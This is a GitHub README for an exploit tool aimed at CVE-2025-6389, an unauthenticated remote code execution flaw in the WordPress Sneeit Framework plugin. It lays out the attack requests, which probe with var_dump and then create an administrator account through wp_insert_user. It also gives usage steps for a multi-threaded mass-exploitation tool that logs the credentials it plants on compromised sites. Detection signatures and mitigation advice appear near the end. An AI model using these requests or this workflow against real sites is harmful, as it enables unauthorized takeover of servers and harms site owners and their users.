Nxploited/CVE-2025-6389

GitHub: Nxploited/CVE-2025-6389

该工具是针对 CVE-2025-6389 的未认证 RCE 漏洞利用脚本,解决 Sneeit Framework 插件在无身份验证时可被恶意调用导致服务器沦陷的问题。

Stars: 0 | Forks: 0

# CVE-2025-6389 Sneeit Framework <= 8.3 - 未认证远程代码执行漏洞(sneeit_articles_pagination_callback)
``` _______ ________ ___ ___ ___ _____ __ ____ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \| ____| / /|___ \ / _ \ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | |__ ______ / /_ __) | (_) | (_) | | | \ \/ / | __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, | | |____ \ / | |____ / /_| |_| / /_ ___) | | (_) |__) | (_) | / / \_____| \/ |______| |____|\___|/____|____/ \___/____/ \___/ /_/ ```
[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited) [![CVE](https://img.shields.io/badge/CVE-2025--6389-critical?style=for-the-badge&logo=cve&logoColor=white&color=CC0000)](https://www.cve.org/CVERecord?id=CVE-2025-6389) [![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2025-6389) [![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org) [![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#%EF%B8%8F-disclaimer)
## 🧠 概述 **CVE-2025-6389** 是一个 **CVSS 9.8 严重** 级别的远程代码执行漏洞,存在于 WordPress 的 **Sneeit Framework** 插件中。 该漏洞存在于 `sneeit_articles_pagination_callback()` 函数中,该函数盲目地将 **用户提供的输入** 传递给 PHP 的 `call_user_func()` —— 未认证的攻击者可以调用任意 PHP 函数并传入任意参数,包括 `wp_insert_user`,从而有效地获得 **完全的管理员权限** 或执行任意服务器端代码。 | 字段 | 详细信息 | |----------------------|----------------------------------------------| | **CVE ID** | CVE-2025-6389 | | **插件** | Sneeit Framework (`sneeit-framework`) | | **受影响版本**| 所有 **8.3 及以下** 版本 | | **漏洞类型** | 远程代码执行 (RCE) | | **攻击向量** | 网络 — 无需认证 | | **CVSS 3.1 分数** | **9.8 严重** | | **CVSS 向量** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **CNA** | Wordfence | | **影响** | 完整服务器沦陷 / 管理员接管 | | **研究员** | Nxploited | ## 💀 漏洞深度分析 根本原因是插件 AJAX 处理程序中误用了 PHP 的 `call_user_func()`: ``` // Registered without authentication check add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback'); function sneeit_articles_pagination_callback() { $callback = $_POST['callback']; // ← User-controlled function name $args = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args // Calling ANY PHP function with ANY arguments — zero validation $result = call_user_func($callback, ...$args); echo $result; die(); } ``` **为何此漏洞严重:** - `wp_ajax_nopriv_*` = **任何人都可访问,无需登录** - `call_user_func($callback, $args)` = 任意函数调用 - 攻击者可调用 `var_dump`、`system`、`wp_insert_user`、`eval` 或任意 PHP/WordPress 函数 - 响应直接返回 — 能够实现 **盲注与详细输出的 RCE** ## ⚔️ 攻击链 ``` Step 1 — Probe / Fingerprint ────────────────────────────────────────────────────────────────── POST /wp-admin/admin-ajax.php action = sneeit_articles_pagination callback = var_dump args = ["test"] Expected Response → array(1) { [0]=> string(4) "test" } ↓ Confirms: call_user_func() is reachable and reflecting output ────────────────────────────────────────────────────────────────── Step 2 — Admin Account Creation ────────────────────────────────────────────────────────────────── POST /wp-admin/admin-ajax.php action = sneeit_articles_pagination callback = wp_insert_user args = {"user_login":"Nxploited_XXXX", "user_pass":"xplpass", "user_email":"...", "role":"administrator"} Result → New administrator account silently created on target ↓ Full WordPress admin panel access achieved ✔️ ``` ## ⚙️ 需求 ``` pip install requests rich ``` | 依赖项 | 用途 | |-------------|-------------------------------------------| | `requests` | 支持会话/代理的 HTTP 请求 | | `rich` | 实时终端仪表板、面板和进度条 | | `threading` | 并发多目标处理 | | `queue` | 线程安全的目标分发 | ## 📂 文件结构 ``` CVE-2025-6389/ ├── CVE-2025-6389.py # Main exploit script ├── list.txt # Target URLs — one per line ├── success_results.txt # Auto-generated: successful targets + credentials └── debug_responses/ # Auto-generated: raw server responses for debugging └── .resp.txt ``` ## 🚀 使用方法 ### 步骤 1 — 准备目标 创建 `list.txt`,每行一个 URL: ``` https://target1.com https://target2.com http://target3.com ``` ### 步骤 2 — 运行漏洞利用程序 ``` python CVE-2025-6389.py ``` 系统会提示你: ``` Targets file name (default list.txt): list.txt Number of threads (default 10): 20 ``` ### 步骤 3 — 实时仪表板 脚本会启动一个 **实时 Rich 仪表板**,显示: ``` ┌─────────────────────────────────────────────────────────────────────┐ │ [ASCII BANNER] │ ├──────────────────────────────┬──────────────────────────────────────┤ │ Info │ Stats │ │ Usage: Put targets in... │ Total Targets: 150 │ │ Threads: 20 │ Processed: 87 │ │ Password: xplpass │ Successes: 12 │ │ Success Log: success... │ Failures: 75 │ │ Debug Dir: debug_responses │ Elapsed: 00:01:43 │ ├──────────────────────────────┴──────────────────────────────────────┤ │ Recent Results │ │ Time Target Result │ │ 14:23:01 https://victim.com SUCCESS │ │ 14:23:03 https://example.net FAIL │ └─────────────────────────────────────────────────────────────────────┘ ``` ### 步骤 4 — 查看结果 **成功利用** 的结果将保存至 `success_results.txt`: ``` https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: Nxploited_4821@gmail.com ``` **调试响应**(针对失败目标)保存在 `debug_responses/` 目录下: ``` debug_responses/ └── https___victim.com.resp.txt ← Raw server response for analysis ``` ## 🖥️ 脚本参数参考 | 提示项 | 默认值 | 描述 | |---------------------|---------------------|-----------------------------------------------| | 目标文件 | `list.txt` | 包含目标 URL 的文件 | | 线程数 | `10`(最大:`200`) | 并发工作线程数 — 批量扫描时增加此值 | | 密码 | `xplpass`(硬编码) | 创建的管理员账户密码 | | 用户名格式 | `Nxploited_XXXX` | 自动生成,带随机 4 位后缀 | ## 📊 检测特征 该漏洞利用程序生成以下网络特征 — 有助于防御者和 WAF 规则编写者: ``` POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=sneeit_articles_pagination&callback=&args= ``` **WAF / IDS 规则(伪代码):** ``` IF request.method == POST AND request.path == "/wp-admin/admin-ajax.php" AND request.body CONTAINS "sneeit_articles_pagination" AND request.body CONTAINS "callback" THEN BLOCK + ALERT ``` ## 🛡️ 缓解与修复 如果你是 **网站所有者、开发人员或防御者**,请立即采取以下措施: - ✅ **更新** Sneeit Framework 至 **8.3 以上** 版本(如有补丁) - ✅ **停用并删除** 该插件,直到确认已修复 - ✅ **审计** 最近创建的 WordPress 管理员账户,查找未授权条目 - ✅ **实施** 服务端输入验证 — 切勿将用户输入传递给 `call_user_func()` - ✅ **阻止** 在 WAF/防火墙层面对 `admin-ajax.php` 的未认证 POST 请求 - ✅ **监控** 服务器日志中 `sneeit_articles_pagination` AJAX 动作调用 - ✅ **启用** 所有现有管理员账户的双因素认证作为临时防护措施 ## ⚠️ 免责声明 ``` THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION TESTING, AND SECURITY RESEARCH PURPOSES ONLY. By downloading, running, or modifying this script, you explicitly agree: • You have EXPLICIT, WRITTEN authorization from the owner of every system you test. No exceptions. • You are operating within a controlled lab environment or during a formally scoped and authorized engagement. • You will NOT deploy this tool against any system, network, or infrastructure you do not have legal permission to test. • Nxploited and all contributors assume ZERO liability for any unauthorized use, damage, data loss, legal action, or criminal prosecution arising from the use of this tool. Unauthorized use of this exploit is a criminal offense under: — Computer Fraud and Abuse Act (CFAA), USA — Computer Misuse Act (CMA), UK — EU Directive 2013/40/EU on Attacks Against Information Systems — And all equivalent national and international cybercrime laws. USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY. ``` ## 👤 作者
| | | |---------------|----------------------------------------------------------------| | **Handle** | Nxploited (Khaled Alenazi) | | **Telegram** | [@KNxploited](https://t.me/KNxploited) | | **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
Nxploited 精心制作 · 仅限授权安全研究 · CVSS 9.8 严重
标签:call_user_func, CVE-2025-6389, CVSS 9.8, OpenVAS, PHP, RCE, Sneeit Framework, WordPress, WordPress安全, 协议分析, 回调函数, 威胁模拟, 插件安全, 操作系统监控, 未认证攻击, 权限提升, 漏洞分析, 编程工具, 路径探测, 远程代码执行, 逆向工具